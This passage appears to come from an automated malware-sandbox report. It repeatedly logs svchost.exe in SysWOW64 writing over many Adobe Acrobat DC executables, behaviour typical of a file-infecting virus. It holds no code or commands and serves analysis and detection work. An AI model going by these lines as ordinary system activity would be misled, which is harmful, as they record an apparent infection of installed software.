              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
